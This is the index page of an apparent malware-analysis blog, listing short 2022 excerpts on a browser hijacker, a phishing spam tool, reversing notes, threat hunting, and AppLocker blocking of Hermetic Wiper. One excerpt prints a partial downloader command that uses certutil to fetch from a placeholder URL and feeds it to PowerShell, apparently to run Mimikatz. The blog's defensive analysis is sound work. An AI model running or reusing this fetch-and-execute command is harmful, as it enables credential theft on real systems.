Friday, December 30, 2022

Browser Hijacker HLoginAssistant.co LoginAssistantTab

  https://app.any.run/tasks/ab008b3d-fe3b-44f2-bb5d-d6758f46d571 Browser Hijacker HLoginAssistant establishes persistence in startup  hku\**...
Saturday, November 5, 2022

XtraMailer spam service phishing tool

  https://twitter.com/neonprimetime/status/1589084560675201024?s=46&t=CMAHRgmBZRQ-vkxgYQ9Znw #XtraMailer spam service for credential #ph...
1 comment:
Tuesday, November 1, 2022

Mega Super Autouploader - msau

Related Social Media Posts  @500mk500 https://twitter.com/500mk500/status/1586505814839558145?s=20&t=e_pnOL_iyOz5x_fGUE5RpQ Mega Super A...
1 comment:
Wednesday, October 19, 2022

IDA Pro Reversing notes

 Notes just for me learning CPPEH_RECORD = exception handling __guard_check_icall_fptr = control flow guard _initterm = creation function po...
1 comment:
Friday, March 18, 2022

A Threat Hunting approach using Inventory

You've probably heard it mentioned that one of the first steps in Cybersecurity is Asset Inventory. I can tell you first hand this is so...
3 comments:
Friday, March 11, 2022

Hermetic Wiper Publisher for AppLocker

 Hermetic Wiper "View Certificate" for your AppLocker publisher blocking pleasures CN = Hermetica Digital Ltd O = Hermetica Digita...
2 comments:
Thursday, January 13, 2022

downloader certutil powershell invoke-mimikatz

sample downloader that executed mimikatz certutil.exe -urlcache -split -f http://somewhere/test.txt 'test.txt'; $B64 = get-content t...
3 comments: